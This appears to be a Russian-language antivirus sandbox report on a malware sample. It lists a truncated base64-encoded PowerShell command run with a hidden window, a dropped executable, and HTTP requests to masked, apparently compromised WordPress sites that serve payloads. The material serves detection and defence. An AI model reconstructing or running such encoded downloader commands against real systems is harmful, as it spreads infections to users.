Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABKADIAMAA3AF8AOAA5AD0AJwBLADcAMQAyADEAOQAnADsAJABPADkANQAzADgANQAgAD0AIAAnADMANwAzACcAOwAkAGYAMgA2ADYAMwBfADQAPQAnAGMANQAyADgAOAA4ADQAMQAnADsAJABGADYAMQAwAF8AXwA9ACQAZQBuAHYAOgB1AHMAZQB...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1496
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\1393198.cvr
- %HOMEPATH%\373.exe
Удаляет следующие файлы
- %HOMEPATH%\373.exe
Сетевая активность
Подключается к
- 'te###vivo.com':80
- 'sp####ystems.com':80
- 'lu######diancatering.co.uk':80
- 'pr##ma.ch':80
TCP
Запросы HTTP GET
- http://te###vivo.com/hq1g/vp33l1h56_o4b8mev9qw-7034/
- http://sp####ystems.com/wp-admin/eUJLagjD/
- http://lu######diancatering.co.uk/wp-includes/ukoe_7v10mk-02/
- http://pr##ma.ch/wp-content/fFVmwFqTq/
UDP
- DNS ASK po##duo.com
- DNS ASK te###vivo.com
- DNS ASK sp####ystems.com
- DNS ASK lu######diancatering.co.uk
- DNS ASK pr##ma.ch
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABKADIAMAA3AF8AOAA5AD0AJwBLADcAMQAyADEAOQAnADsAJABPADkANQAzADgANQAgAD0AIAAnADMANwAzACcAOwAkAGYAMgA2ADYAMwBfADQAPQAnAGMANQAyADgAOAA4ADQAMQAnADsAJABGADYAMQAwAF8AXwA9ACQAZQBuAHYAOgB1AHMAZQB...' (со скрытым окном)
